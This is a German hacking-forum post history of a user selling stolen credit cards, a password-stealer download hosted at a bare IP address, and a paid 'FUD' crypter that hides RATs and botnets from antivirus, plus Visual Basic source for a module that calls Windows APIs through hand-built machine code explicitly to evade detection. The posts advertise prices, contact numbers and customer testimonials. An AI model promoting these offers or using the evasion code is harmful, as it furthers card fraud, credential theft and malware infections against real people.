Beiträge von angerfist


    [size=4]www.ccshop.eu[/size]
    [size=4]www.cc-store.cc[/size]


    Hiermit möchte ich euch meinen CC-Shop vorstellen.


    Ich biete euch Hochwertige Deutsche Kreditkarten an!
    Meine CC's sind immer 100% valid und haben ein Limit von ca. 1k - 1,5k.
    Falls eure CC mal nicht valid sein sollte,
    gibt es sofortigen Ersatz!


    Ihr wundert euch, weil es so aussieht wie r00t's Script?
    Ja es ist r00t sein Script und er wei� auch Bescheid und wird mich unterstützen.


    Ihr müsst nie auf einen CC Dealer warten und euch rumstreiten,
    weil mal was nicht funktioniert.
    Bei mir habt ihr keine Wartezeiten und sind 24/7 erreichbar!


    Wieviel meine CC's kosten?
    1 CC = 10â?¬
    3 CC's = 25â?¬
    7 CC's = 50â?¬
    15 CC's = 100â?¬


    Jetzt sofort registrieren und ab dem 1.02 - 15 Uhr,
    100% valid und qualitative CCs kaufen!


    Euer angerfist1
    Fehler beim Kontakt, bitte unter 603995 melden!!

    Angerfist1


    * Alter: 16
    * Wohnort: Egal
    * Beruf: Schüler
    * Rank: Entwickler
    * Spezialgebiet: Stealer/Crypter
    * Im Team seit: 1.01.2009


    Ã?ber mich:
    Code seit ca. 6 Monaten. Nicht sehr lange, hatte aber einen sehr guten Lehrer und war auch immer flei�ig am lernen. Ich code momentan in Visual Basic 6. Fange aber bald mit C++ an. Wenn ihr Fragen bezüglich meinem Spezialgebiet habt, könnt ihr sie mir ruhig stellen. Ich antworte immer, au�er die Frage ist mir zu blöd...

    Hab euch mal ein kleines Password Recovery Tool gecoded.
    Es dumpt euch folgende Passwörter:


      FireFox 3


      Internet Explorer 6


      Internet Explorer 7


      Protected Storage


      MSN


      Outlook Express


      RAS / DialUp


      Windows Key



    Das Tool benutzt keine 3rd Party Apps oder sonst was...
    Was ihr damit macht ist eure Sache!
    Obs FUD ist weiÃ? ich nicht genau, weil ich atm kein Online Scanner kenne der nicht weitergibt.


    Download: http://92.241.164.198/~nana/localdump.rar
    Password: scene-coderz


    Es ist nur auf XP tested!


    Euer angi

    [size=3]Astral Crypter v2[/size]


    Was gibts neues?



    Ein wunderschönes neues Design, danke an Slay2oo7!
    Und natürlich wieder komplett FUD, mit einer wunderschönen neuen Methode ;-)..
    Für nur 40� ist es ein echtes Schnäpchen!


    ----


    AstraL Coding stellt hiermit das erste Projekt vor, den AstraL Crypter!


    Dieser Crypter macht euch jede beliebige *.exe Runtime und Scantime Full Undetected!



    Dieser Crypter verfügt über einzigartige Features:


      Anti Anubis
      Melt
      Anti Kaspersky
      Anti VMWare
      Anti Sandboxie
      EOF Support
      ReAlign PE-Header
      UPX-Packing
      Exe-Pump
      File Binder
      Fake Message
      Paramters (Für Nirsoft Tools!)
      Random Cryptkey


    Das sensationelle ist, er funktioniert mit fast allen RAT's:


      Bifrost 1.1 / Bifrost 1.2.1
      Poison Ivy 2.2 / 2.3.x
      und weitere!


    AuÃ?erdem funktionert er auch mit:


      Satellite 4600
      DKCS BOT
      RxBot
      Traffic-Bot v1-v3


    Anti-Leak ist auch gewährleistet durch Hardware ID Schutz!


    Natürlich wird jeder seine eigene einzigartige Stub bekommen und ist somit selbstverantwortlich darüber wie detected seine Stub wird.


    Jeder von euch bekommt das 1. Update kostenlos dazu. ;)
    Der Preis beträgt nur noch 40�!
    Die Zahlungsmöglichkeit ist PSC! (Weitere werden folgen)
    Fragen wie akzeptierst du auch Webmoney oder so?
    Werden von Grund auf ignoriert!


    Ihr seid interessiert?
    Dann added uns im ICQ und sagt sofort das ihr es sich um den Crypter handelt!
    Angerfist1's Nummer: 603995
    Slay2oo7's Nummer: 318964794


    Es sind noch Fragen offen?
    Dann stell sie hier im Thread!


    *UPDATE* Preis nur noch 40â?¬!


    Bisherige Käufer:


      EXECUTiON * "hab den eben gekauft ech N1 100%FUD schnelle abwicklung netter contact"
      Preaser * "Hab den gekauft, Super Support! Crypter ist 100% FUD, leuft Wunderbar!"
      sp0ng3b0b * "Nice trade, Crypter macht soweit getestet Fud. Nur zu empfehlen."
      XaVoR * "So, bin auch Kunde geworden, muss sagen is n Super Tool! Macht auch FUD!"
      SpaZe * "Super Crypter, Klasse Arbeit von den beiden :)


    ACHTUNG: Wir verkaufen nicht an Noobs! Gibt nur zuviele Probleme! Sorry an alle, aber das ist echt schlimm! :fanfare


    Mit freundlichen Grü�en,
    angerfist1 - Scene-CoderZ.com!

    Hiho alter Freund, sch?n dich auch mal wieder zu sehen :)
    Kennste mich noch? Bin clx ;) wen man hier alles wieder trifft :p

    Das Class-Module, damit k?nnt ihr eure APIs undetected machen.


    Code
    1. Private Declare Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As LongPrivate Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As LongPrivate Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hwnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As LongPrivate Declare Function FreeLibrary Lib "kernel32" (ByVal hLibModule As Long) As LongPrivate Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpDest As Any, lpSource As Any, ByVal cBytes As Long)Private mlngParameters() As Long 'list of parametersPrivate mlngAddress As Long 'address of function to callPrivate mbytCode() As Byte 'buffer for assembly codePrivate mlngCP As Long 'used to keep track of latest byte added to codePrivate Type xbyte arr() As ByteEnd TypePublic Function CallAPIByName(libName As String, funcName As String, ParamArray FuncParams()) As Long Dim arr() As Variant arr() = FuncParams() CallAPIByName = CallRemote(libName, funcName, arr()) Dim i As Long For i = LBound(FuncParams()) To UBound(FuncParams()) FuncParams(i) = arr(i) Next iEnd FunctionPublic Function CallRemote(libName As String, funcName As String, FuncParams() As Variant) As Long Dim lb As Long, i As Integer ReDim mlngParameters(0) ReDim mbytCode(0) mlngAddress = 0 Dim X() As xbyte Dim wasString() As Boolean Dim keineparams As Boolean ' Prepare params If UBound(FuncParams()) = -1 Then keineparams = True GoTo keineparams End If On Error GoTo 0 ReDim wasString(UBound(FuncParams())) For i = LBound(FuncParams()) To UBound(FuncParams()) wasString(i) = False If VarType(FuncParams(i)) = vbString Then ReDim Preserve X(i) X(i).arr = StrConv(FuncParams(i), vbFromUnicode) & Chr(0) FuncParams(i) = VarPtr(X(i).arr(0)) wasString(i) = True End If Next ikeineparams: lb = LoadLibrary(ByVal libName) If lb = 0 Then MsgBox "DLL not found", vbCritical Exit Function End If mlngAddress = GetProcAddress(lb, ByVal funcName) If mlngAddress = 0 Then MsgBox "Function entry not found", vbCritical FreeLibrary lb Exit Function End If ReDim mlngParameters(UBound(FuncParams) + 1) For i = 1 To UBound(mlngParameters) mlngParameters(i) = CLng(FuncParams(i - 1)) Next i CallRemote = CallWindowProc(PrepareCode, 0, 0, 0, 0) FreeLibrary lb If keineparams Then Exit Function For i = LBound(FuncParams()) To UBound(FuncParams()) If wasString(i) Then ' kann ja sein das es buffershit war FuncParams(i) = StrConv(X(i).arr(), vbUnicode) End If Next iEnd FunctionPrivate Function PrepareCode() As Long Dim lngX As Long, codeStart As Long ReDim mbytCode(18 + 32 + 6 * UBound(mlngParameters)) codeStart = GetAlignedCodeStart(VarPtr(mbytCode(0))) mlngCP = codeStart - VarPtr(mbytCode(0)) For lngX = 0 To mlngCP - 1 mbytCode(lngX) = &HCC Next AddByteToCode &H58 'pop eax AddByteToCode &H59 'pop ecx AddByteToCode &H59 'pop ecx AddByteToCode &H59 'pop ecx AddByteToCode &H59 'pop ecx AddByteToCode &H50 'push eax For lngX = UBound(mlngParameters) To 1 Step -1 AddByteToCode &H68 'push wwxxyyzz AddLongToCode mlngParameters(lngX) Next AddCallToCode mlngAddress AddByteToCode &HC3 AddByteToCode &HCC PrepareCode = codeStartEnd FunctionPrivate Sub AddCallToCode(lngAddress As Long) AddByteToCode &HE8 AddLongToCode lngAddress - VarPtr(mbytCode(mlngCP)) - 4End SubPrivate Sub AddLongToCode(lng As Long) Dim intX As Integer Dim byt(3) As Byte CopyMemory byt(0), lng, 4 For intX = 0 To 3 AddByteToCode byt(intX) NextEnd SubPrivate Sub AddByteToCode(byt As Byte) mbytCode(mlngCP) = byt mlngCP = mlngCP + 1End SubPrivate Function GetAlignedCodeStart(lngAddress As Long) As Long GetAlignedCodeStart = lngAddress + (15 - (lngAddress - 1) Mod 16) If (15 - (lngAddress - 1) Mod 16) = 0 Then GetAlignedCodeStart = GetAlignedCodeStart + 16End Function


    Der Aufruf m?sste jedem klar sein ;)

    Code
    1. Call CallAPIByName(LibaryName z.B."kernel32", FunktionsName z.B."Sleep",FunctionsParameter z.B. 100)


    Ich hoffe ich konnte euch ein wenig helfen ;)

    Hallo Scene-CoderZ Team & Member,


    mein Name ist angerfist1, bin auf vielen Boards zu finden - und helfe immer gerne - wenn es qualifizierte Fragen sind. U_A hat auf 1337crew geworben, deshalb hab ich mich hier mal angemeldet, weil ich auch code. Ich code in Visual Basic, s?mtliche Stealer und Crypter. Was ich auch beherrsche ist das Manual Packing. Moderatoren Erfahrungen besitze ich auch, weil ich damals auf Crank(falls es noch jmd. kennt :p) S-Mod war. Ich hoffe das es euch f?rs erste reicht ;).


    Mit freundlichen Gr??en,
    angerfist1